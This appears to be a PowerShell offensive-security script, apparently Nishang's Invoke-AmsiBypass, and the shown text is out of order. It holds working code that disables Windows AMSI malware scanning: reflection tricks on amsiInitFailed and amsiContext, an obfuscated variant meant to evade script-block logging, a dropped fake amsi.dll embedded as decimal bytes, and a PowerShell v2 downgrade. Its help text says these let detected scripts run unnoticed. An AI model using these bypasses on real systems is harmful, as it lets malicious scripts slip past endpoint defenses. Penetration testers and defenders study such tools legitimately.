6 0 0 46 98 115 115 0 0 0 0 0 64 0 0 176 1 0 0 46 112 100 97 116 97 0 0 0 80 0 0 16 0 0 0 46 103 102 105 100 115 36 121 0 0 0 0 0 96 0 0 88 0 0 0 46 114 115 114 99 36 48 49 0 0 0 0 96 96 0 0 128 1 0 0 46 114 115 114 99 36 48 50 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 17 21 8 0 21 116 9 0 21 100 7 0 21 52 6 0 21 50 17 224 236 29 0 0 1 0 0 0 207 16 0 0 92 17 0 0 82 30 0 0 0 0 0 0 17 15 6 0 15 100 8 0 15 52 6 0 15 50 11 112 236 29 0 0 1 0 0 0 246 17 0 0 20 18 0 0 105 30 0 0 0 0 0 0 1 6 2 0 6 50 2 80 1 20 8 0 20 100 8 0 20 84 7 0 20 52 6 0 20 50 16 112 9 26 6 0 26 52 15 0 26 114 22 224 20 112 19 96 236 29 0 0 1 0 0 0 102 18 0 0 54 19 0 0 133 30 0 0 54 19 0 0 1 6 2 0 6 82 2 80 1 9 1 0 9 98 0 0 1 8 4 0 8 114 4 112 3 96 2 48 9 4 1 0 4 34 0 0 236 29 0 0 1 0 0 0 215 23 0 0 101 24 0 0 187 30 0 0 101 24 0 0 1 2 1 0 2 80 0 0 1 4 1 0 4 66 0 0 1 6 2 0 6 50 2 48 1 13 4 0 13 52 10 0 13 114 6 80 1 13 4 0 13 52 9 0 13 50 6 80 1 21 5 0 21 52 186 0 21 1 184 0 6 80 0 0 1 15 6 0 15 100 7 0 15 52 6 0 15 50 11 112 1 13 4 0 13 52 7 0 13 50 6 80 0 0 0 0 1 0 0 0 56 39 0 0 0 0 0 0 0 0 0 0 62 40 0 0 120 32 0 0 104 39 0 0 0 0 0 0 0 0 0 0 6 41 0 0 168 32 0 0 192 38 0 0 0 0 0 0 0 0 0 0 114 42 0 0 0 32 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 106 41 0 0 0 0 0 0 86 41 0 0 0 0 0 0 60 41 0 0 0 0 0 0 40 41 0 0 0 0 0 0 164 41 0 0 0 0 0 0 94 42 0 0 0 0 0 0 72 42 0 0 0 0 0 0 46 42 0 0 0 0 0 0 24 42 0 0 0 0 0 0 2 42 0 0 0 0 0 0 232 41 0 0 0 0 0 0 204 41 0 0 0 0 0 0 184 41 0 0 0 0 0 0 134 41 0 0 0 0 0 0 0 0 0 0 0 0 0 0 52 40 0 0 0 0 0 0 20 40 0 0 0 0 0 0 252 39 0 0 0 0 0 0 218 39 0 0 0 0 0 0 184 39 0 0 0 0 0 0 0 0 0 0 0 0 0 0 252 40 0 0 0 0 0 0 238 40 0 0 0 0 0 0 214 40 0 0 0 0 0 0 186 40 0 0 0 0 0 0 158 40 0 0 0 0 0 0 124 40 0 0 0 0 0 0 106 40 0 0 0 0 0 0 92 40 0 0 0 0 0 0 80 40 0 0 0 0 0 0 0 0 0 0 0 0 0 0 40 0 95 95 116 101 108 101 109 101 116 114 121 95 109 97 105 110 95 105 110 118 111 107 101 95 116 114 105 103 103 101 114 0 41 0 95 95 116 101 108 101 109 101 116 114 121 95 109 97 105 110 95 114 101 116 117 114 110 95 116 114 105 103 103 101 114 0 8 0 95 95 67 95 115 112 101 99 105 102 105 99 95 104 97 110 100 108 101 114 0 0 37 0 95 95 115 116 100 95 116 121 112 101 95 105 110 102 111 95 100 101 115 116 114 111 121 95 108 105 115 116 0 0 62 0 109 101 109 115 101 116 0 0 86 67 82 85 78 84 73 77 69 49 52 48 46 100 108 108 0 0 54 0 95 105 110 105 116 116 101 114 109 0 55 0 95 105 110 105 116 116 101 114 109 95 101 0 63 0 95 115 101 104 95 102 105 108 116 101 114 95 100 108 108 0 51 0 95 105 110 105 116 105 97 108 105 122 101 95 110 97 114 114 111 119 95 101 110 118 105 114 111 110 109 101 110 116 0 0 52 0 95 105 110 105 116 105 97 108 105 122 101 95 111 110 101 120 105 116 95 116 97 98 108 101 0 0 60 0 95 114 101 103 105 115 116 101 114 95 111 110 101 120 105 116 95 102 117 110 99 116 105 111 110 0 34 0 95 101 120 101 99 117 116 101 95 111 110 101 120 105 116 95 116 97 98 108 101 0 30 0 95 99 114 116 95 97 116 101 120 105 116 0 22 0 95 99 101 120 105 116 0 0 97 112 105 45 109 115 45 119 105 110 45 99 114 116 45 114 117 110 116 105 109 101 45 108 49 45 49 45 48 46 100 108 108 0 174 4 82 116 108 67 97 112 116 117 114 101 67 111 110 116 101 120 116 0 181 4 82 116 108 76 111 111 107 117 112 70 117 110 99 116 105 111 110 69 110 116 114 121 0 0 188 4 82 116 108 86 105 114 116 117 97 108 85 110 119 105 110 100 0 0 146 5 85 110 104 97 110 100 108 101 100 69 120 99 101 112 116 105 111 110 70 105 108 116 101 114 0 0 82 5 83 101 116 85 110 104 97 110 100 108 101 100 69 120 99 101 112 116 105 111 110 70 105 108 116 101 114 0 15 2 71 101 116 67 117 114 114 101 110 116 80 114 111 99 101 115 115 0 112 5 84 101 114 109 105 110 97 116 101 80 114 111 99 101 115 115 0 0 112 3 73 115 80 114 111 99 101 115 115 111 114 70 101 97 116 117 114 101 80 114 101 115 101 110 116 0 48 4 81 117 101 114 121 80 101 114 102 111 114 109 97 110 99 101 67 111 117 110 116 101 114 0 16 2 71 101 116 67 117 114 114 101 110 116 80 114 111 99 101 115 115 73 100 0 20 2 71 101 116 67 117 114 114 101 110 116 84 104 114 101 97 100 73 100 0 0 221 2 71 101 116 83 121 115 116 101 109 84 105 109 101 65 115 70 105 108 101 84 105 109 101 0 84 3 73 110 105 116 105 97 108 105 122 101 83 76 105 115 116 72 101 97 100 0 106 3 73 115 68 101 98 117 103 103 101 114 80 114 101 115 101 110 116 0 75 69 82 78 69 76 51 50 46 100 108 108 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 50 162 223 45 153 43 0 0 205 93 32 210 102 212 255 255 255 255 255 255 0 0 0 0 1 0 0 0 2 0 0 0 47 32 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 32 16 0 0 65 16 0 0 48 37 0 0 68 16 0 0 148 16 0 0 16 38 0 0 148 16 0 0 191 17 0 0 52 37 0 0 192 17 0 0 66 18 0 0 96 37 0 0 68 18 0 0 76 19 0 0 164 37 0 0 76 19 0 0 160 19 0 0 144 37 0 0 160 19 0 0 221 19 0 0 72 38 0 0 224 19 0 0 20 20 0 0 24 38 0 0 20 20 0 0 229 20 0 0 212 37 0 0 232 20 0 0 89 21 0 0 220 37 0 0 92 21 0 0 149 21 0 0 16 38 0 0 152 21 0 0 184 21 0 0 16 38 0 0 184 21 0 0 205 21 0 0 16 38 0 0 208 21 0 0 248 21 0 0 16 38 0 0 248 21 0 0 13 22 0 0 16 38 0 0 16 22 0 0 113 22 0 0 144 37 0 0 116 22 0 0 164 22 0 0 16 38 0 0 164 22 0 0 184 22 0 0 16 38 0 0 184 22 0 0 1 23 0 0 24 38 0 0 4 23 0 0 205 23 0 0 32 38 0 0 208 23 0 0 108 24 0 0 232 37 0 0 108 24 0 0 144 24 0 0 24 38 0 0 144 24 0 0 187 24 0 0 24 38 0 0 188 24 0 0 11 25 0 0 24 38 0 0 12 25 0 0 35 25 0 0 16 38 0 0 36 25 0 0 208 25 0 0 44 38 0 0 252 25 0 0 23 26 0 0 16 38 0 0 32 26 0 0 101 27 0 0 56 38 0 0 104 27 0 0 178 27 0 0 72 38 0 0 180 27 0 0 254 27 0 0 72 38 0 0 8 28 0 0 201 29 0 0 88 38 0 0 80 30 0 0 82 30 0 0 104 38 0 0 82 30 0 0 105 30 0 0 136 37 0 0 105 30 0 0 133 30 0 0 136 37 0 0 133 30 0 0 187 30 0 0 204 37 0 0 187 30 0 0 211 30 0 0 8 38 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 54 0 0 0 73 0 0 0 76 0 0 0 11 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 24 0 0 0 24 0 0 128 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 2 0 0 0 48 0 0 128 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 9 4 0 0 72 0 0 0 96 96 0 0 125 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 60 63 120 109 108 32 118 101 114 115 105 111 110 61 39 49 46 48 39 32 101 110 99 111 100 105 110 103 61 39 85 84 70 45 56 39 32 115 116 97 110 100 97 108 111 110 101 61 39 121 101 115 39 63 62 13 10 60 97 115 115 101 109 98 108 121 32 120 109 108 110 115 61 39 117 114 110 58 115 99 104 101 109 97 115 45 109 105 99 114 111 115 111 102 116 45 99 111 109 58 97 115 109 46 118 49 39 32 109 97 110 105 102 101 115 116 86 101 114 115 105 111 110 61 39 49 46 48 39 62 13 10 32 32 60 116 114 117 115 116 73 110 102 111 32 120 109 108 110 115 61 34 117 114 110 58 115 99 104 101 109 97 115 45 109 105 99 114 111 115 111 102 116 45 99 111 109 58 97 115 109 46 118 51 34 62 13 10 32 32 32 32 60 115 101 99 117 114 105 116 121 62 13 10 32 32 32 32 32 32 60 114 101 113 117 101 115 116 101 100 80 114 105 118 105 108 101 103 101 115 62 13 10 32 32 32 32 32 32 32 32 60 114 101 113 117 101 115 116 101 100 69 120 101 99 117 116 105 111 110 76 101 118 101 108 32 108 101 118 101 108 61 39 97 115 73 110 118 111 107 101 114 39 32 117 105 65 99 99 101 115 115 61 39 102 97 108 115 101 39 32 47 62 13 10 32 32 32 32 32 32 60 47 114 101 113 117 101 115 116 101 100 80 114 105 118 105 108 101 103 101 115 62 13 10 32 32 32 32 60 47 115 101 99 117 114 105 116 121 62 13 10 32 32 60 47 116 114 117 115 116 73 110 102 111 62 13 10 60 47 97 115 115 101 109 98 108 121 62 13 10 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 32 0 0 24 0 0 0 248 160 0 161 88 161 96 161 56 162 80 162 88 162 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0" + + if (([IntPtr]::Size) -eq 8) + { + Write-Verbose "64 bit process detected." + $DllBytes = $AmsiX64 + } + elseif (([IntPtr]::Size) -eq 4) + { + Write-Verbose "32 bit process detected." + $DllBytes = $AmsiX86 + } + + switch($method) + { + + "unload" + { + Write-Verbose "Using Matt Graeber's Reflection method." + if ($ShowOnly -eq $True) + { + Write-Output "Use the following scriptblock before you run a script which gets detected." + Write-Output '[Ref].Assembly.GetType(''System.Management.Automation.AmsiUtils'').GetField(''amsiInitFailed'',''NonPublic,Static'').SetValue($null,$true)' + } + else + { + Write-Output "Executing the bypass." + [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true) + } + } + + "unloadsilent" + { + Write-Verbose "Using Matt Graeber's Reflection method with WMF5 autologging bypass." + if ($ShowOnly -eq $True) + { + Write-Output "Use the following scriptblock before you run a script which gets detected." + Write-Output '[Delegate]::CreateDelegate(("Func``3[String, $(([String].Assembly.GetType(''System.Reflection.Bindin''+''gFlags'')).FullName), System.Reflection.FieldInfo]" -as [String].Assembly.GetType(''System.T''+''ype'')), [Object]([Ref].Assembly.GetType(''System.Management.Automation.AmsiUtils'')),(''GetFie''+''ld'')).Invoke(''amsiInitFailed'',((''Non''+''Public,Static'') -as [String].Assembly.GetType(''System.Reflection.Bindin''+''gFlags''))).SetValue($null,$True)' + } + else + { + Write-Output "Executing the bypass." + [Delegate]::CreateDelegate(("Func``3[String, $(([String].Assembly.GetType('System.Reflection.Bindin'+'gFlags')).FullName), System.Reflection.FieldInfo]" -as [String].Assembly.GetType('System.T'+'ype')), [Object]([Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')),('GetFie'+'ld')).Invoke('amsiInitFailed',(('Non'+'Public,Static') -as [String].Assembly.GetType('System.Reflection.Bindin'+'gFlags'))).SetValue($null,$True) + } + } + + "unloadobfuscated" + { + Write-Verbose "Using Matt Graeber's Reflection method with obfuscation from Daneil Bohannon's Invoke-Obfuscation - which bypasses WMF5 autologging." + if ($ShowOnly -eq $True) + { + $code = @" +Sv ('R9'+'HYt') ( " ) )93]rahC[]gnirtS[,'UCS'(ecalpeR.)63]rahC[]gnirtS[,'aEm'(ecalpeR.)')eurt'+'aEm,llun'+'aEm(eulaVt'+'eS'+'.)UCScit'+'atS,ci'+'lbuPnoNUCS'+',U'+'CSdeli'+'aFt'+'inI'+'is'+'maUCS('+'dle'+'iF'+'teG'+'.'+')'+'UCSslitU'+'is'+'mA.noitamotu'+'A.tn'+'em'+'eganaM.'+'m'+'e'+'t'+'sySUCS(epy'+'TteG.ylbmessA'+'.]'+'feR['( (noisserpxE-ekovnI" ); Invoke-Expression( -Join ( VaRIAbLe ('R9'+'hyT') -val )[ - 1..- (( VaRIAbLe ('R9'+'hyT') -val ).Length)]) +"@ + Write-Output "Use the following scriptblock before you run a script which gets detected." + Write-Output $code + } + else + { + Write-Output "Executing the bypass." + Sv ('R9'+'HYt') ( " ) )93]rahC[]gnirtS[,'UCS'(ecalpeR.)63]rahC[]gnirtS[,'aEm'(ecalpeR.)')eurt'+'aEm,llun'+'aEm(eulaVt'+'eS'+'.)UCScit'+'atS,ci'+'lbuPnoNUCS'+',U'+'CSdeli'+'aFt'+'inI'+'is'+'maUCS('+'dle'+'iF'+'teG'+'.'+')'+'UCSslitU'+'is'+'mA.noitamotu'+'A.tn'+'em'+'eganaM.'+'m'+'e'+'t'+'sySUCS(epy'+'TteG.ylbmessA'+'.]'+'feR['( (noisserpxE-ekovnI" ); Invoke-Expression( -Join ( VaRIAbLe ('R9'+'hyT') -val )[ - 1..- (( VaRIAbLe ('R9'+'hyT') -val ).Length)]) + + } + } + + "unload2" + { + Write-Verbose "Using Matt Graeber's second Reflection method." + if ($ShowOnly -eq $True) + { + Write-Output "Use the following scriptblock before you run a script which gets detected." + Write-Output '[Runtime.InteropServices.Marshal]::WriteInt32([Ref].Assembly.GetType(''System.Management.Automation.AmsiUtils'').GetField(''amsiContext'',[Reflection.BindingFlags]''NonPublic,Static'').GetValue($null),0x41414141)' + } + else + { + Write-Output "Executing the bypass." + [Runtime.InteropServices.Marshal]::WriteInt32([Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiContext',[Reflection.BindingFlags]'NonPublic,Static').GetValue($null),0x41414141) + } + } + + "dllhijack" + { + Write-Verbose "Using Cornelis de Plaa's DLL hijack method." + if ($ShowOnly -eq $True) + { + Write-Output "Copy powershell.exe from C:\Windows\System32\WindowsPowershell\v1.0 to a local folder and dropa fake amsi.dll in the same directory." + Write-Output "Run the new powershell.exe and AMSI should be gone for that session." + } + else + { + [Byte[]] $temp = $DllBytes -split ' ' + Write-Output "Executing the bypass." + Write-Verbose "Dropping the fake amsi.dll to disk." + [System.IO.File]::WriteAllBytes("$pwd\amsi.dll", $temp) + + Write-Verbose "Copying powershell.exe to the current working directory." + Copy-Item -Path C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Destination $pwd + + Write-Verbose "Starting powershell.exe from the current working directory." + & "$pwd\powershell.exe" + + } + } + + "psv2" + { + Write-Verbose "Using PowerShell version 2 which doesn't support AMSI." + if ($ShowOnly -eq $True) + { + Write-Output "If .Net version 2.0.50727 is installed, run powershell -v 2 and run scripts from the new PowerShell process." + } + else + { + Write-Verbose "Checking if .Net version 2.0.50727 is installed." + $versions = Get-ChildItem 'HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP' -recurse | Get-ItemProperty -name Version -EA 0 | Where { $_.PSChildName -match '^(?!S)\p{L}'} | Select -ExpandProperty Version + if($versions -match "2.0.50727") + { + Write-Verbose ".Net version 2.0.50727 found." + Write-Output "Executing the bypass." + powershell.exe -version 2 + } + else + { + Write-Verbose ".Net version 2.0.50727 not found. Can't start PowerShell v2." + } + } + } + + "obfuscation" + { + Write-Output "AMSI and the AVs which support it can be bypassed using obfuscation techqniues." + Write-Output "ISE-Steroids (http://www.powertheshell.com/isesteroidsmanual/download/) and Invoke-Obfuscation can be used (https://github.com/danielbohannon/Invoke-Obfuscation)." + } + } + +} + +function Invoke-AmsiBypass +{ +<# +.SYNOPSIS +Nishang script which uses publicly known methods to bypass/avoid AMSI. + +.DESCRIPTION +This script implements publicly known methods bypass or avoid AMSI on Windows machines. + +AMSI is a script malware detection mechanism enabled by default in Windows 10. +(https://msdn.microsoft.com/en-us/library/windows/desktop/dn889587(v=vs.85).aspx) + +This script implements 6 methods of bypassing AMSI. +unload - Method by Matt Graeber. Unloads AMSI from current PowerShell session. +unload2 - Another method by Matt Graeber. Unloads AMSI from current PowerShell session. +unloadsilent - Another method by Matt Graeber. Unloads AMSI and avoids WMF5 autologging. +unloadobfuscated - 'unload' method above obfuscated with Daneil Bohannon's Invoke-Obfuscation - which avoids WMF5 autologging. +dllhijack - Method by Cornelis de Plaa. The amsi.dll used in the code is from p0wnedshell (https://github.com/Cn33liz/p0wnedShell) +psv2 - If .net 2.0.50727 is available on Windows 10. PowerShell v2 is launched which doesn't support AMSI. + +The script also provides information on tools which can be used for obfuscation: +ISE-Steroids (http://www.powertheshell.com/isesteroidsmanual/download/) +Invoke-Obfuscation (https://github.com/danielbohannon/Invoke-Obfuscation) + +.PARAMETER Method +The method to be used for elevation. Defaut one is unloadsilent. + +.PARAMETER ShowOnly +The bypass is not executed. Just shown to the user. + +.EXAMPLE +PS > Invoke-AmsiBypass -Verbose +Above command runs the unloadsilent method. + +.EXAMPLE +PS > Invoke-PsUACme -Method unloadobfuscated -Verbose +Above command runs the unloadobfuscated method. + +.LINK +http://www.labofapenetrationtester.com/2016/09/amsi.html +https://github.com/samratashok/nishang +#> + + + [CmdletBinding()] Param( + + [Parameter(Position = 0, Mandatory = $False)] + [ValidateSet("unload","unloadsilent","unloadobfuscated","unload2","dllhijack","psv2","obfuscation")] + [String] + $Method = "unloadsilent", + + [Parameter(Position = 1, Mandatory = $False)] + [Switch] + $ShowOnly + ) + + $AmsiX86 = "77 90 144 0 3 0 0 0 4 0 0 0 255 255 0 0 184 0 0 0 0 0 0 0 64 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 248 0 0 0 14 31 186 14 0 180 9 205 33 184 1 76 205 33 84 104 105 115 32 112 114 111 103 114 97 109 32 99 97 110 110 111 116 32 98 101 32 114 117 110 32 105 110 32 68 79 83 32 109 111 100 101 46 13 13 10 36 0 0 0 0 0 0 0 190 171 71 149 250 202 41 198 250 202 41 198 250 202 41 198 243 178 186 198 248 202 41 198 148 145 40 199 249 202 41 198 148 145 42 199 251 202 41 198 148 145 44 199 242 202 41 198 148 145 45 199 241 202 41 198 39 53 226 198 248 202 41 198 250 202 40 198 231 202 41 198 40 145 33 199 251 202 41 198 40 145 214 198 251 202 41 198 40 145 43 199 251 202 41 198 82 105 99 104 250 202 41 198 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 80 69 0 0 76 1 6 0 144 29 62 87 0 0 0 0 0 0 0 0 224 0 2 33 11 1 14 0 0 14 0 0 0 18 0 0 0 0 0 0 43 19 0 0 0 16 0 0 0 32 0 0 0 0 0 16 0 16 0 0 0 2 0 0 6 0 0 0 0 0 0 0 6 0 0 0 0 0 0 0 0 112 0 0 0 4 0 0 0 0 0 0 2 0 64 1 0 0 16 0 0 16 0 0 0 0 16 0 0 16 0 0 0 0 0 0 16 0 0 0 0 0 0 0 0 0 0 0 148 36 0 0 80 0 0 0 0 80 0 0 224 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 96 0 0 44 1 0 0 176 32 0 0 112 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 32 33 0 0 64 0 0 0 0 0 0 0 0 0 0 0 0 32 0 0 112 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 46 116 101 120 116 0 0 0 124 12 0 0 0 16 0 0 0 14 0 0 0 4 0 0 0 0 0 0 0 0 0 0 0 0 0 0 32 0 0 96 46 114 100 97 116 97 0 0 220 7 0 0 0 32 0 0 0 8 0 0 0 18 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 64 46 100 97 116 97 0 0 0 136 3 0 0 0 48 0 0 0 2 0 0 0 26 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 192 46 103 102 105 100 115 0 0 20 0 0 0 0 64 0 0 0 2 0 0 0 28 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 64 46 114 115 114 99 0 0 0 224 1 0 0 0 80 0 0 0 2 0 0 0 30 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 64 46 114 101 108 111 99 0 0 44 1 0 0 0 96 0 0 0 2 0 0 0 32 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 66 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 51 192 194 12 0 59 13 4 48 0 16 242 117 2 242 195 242 233 96 3 0 0 85 139 236 139 69 12 131 232 0 116 51 131 232 1 116 32 131 232 1 116 17 